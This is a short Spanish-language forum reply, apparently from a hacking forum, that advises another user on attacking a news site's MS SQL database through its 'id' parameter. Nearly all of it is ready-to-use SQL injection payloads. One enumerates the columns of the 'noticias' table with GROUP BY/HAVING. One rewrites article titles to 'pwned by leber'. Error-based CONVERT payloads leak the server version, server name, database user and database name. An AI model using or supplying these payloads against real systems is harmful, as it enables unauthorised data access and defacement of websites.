aver.......
El simbolo + no te hace falta que lo pongas antes de la coma, podria quedar asi:
id=456+group+by+noticias.ANTETITULO,noticias.TITULO,noticias.ENTRADILLA,noticias.FECHA,noticias.HEAD,noticias.TEXTO+having+1=1--
Si te sigue tirando error, puede ser porque ya no existan mas columnas.
Si quieres updatear una, puedes hacer:
id=456+update+noticias+set+TITULO+=+'pwned by leber'--
Si quieres obtener la
versión del servidor MS SQL, con que hagas esto ya te vale:
id=1+and+1=convert(int,@@version)--
Nombre del servidor:id=1+and+1=convert(int,@@servername)--
Nombre del usuario de la DB:id=1+and+1=convert(int,system_user)
Nombre de la DB de la página web:id=1+and+1=convert(int,db_name())
Espero que te sirva.
Saludos.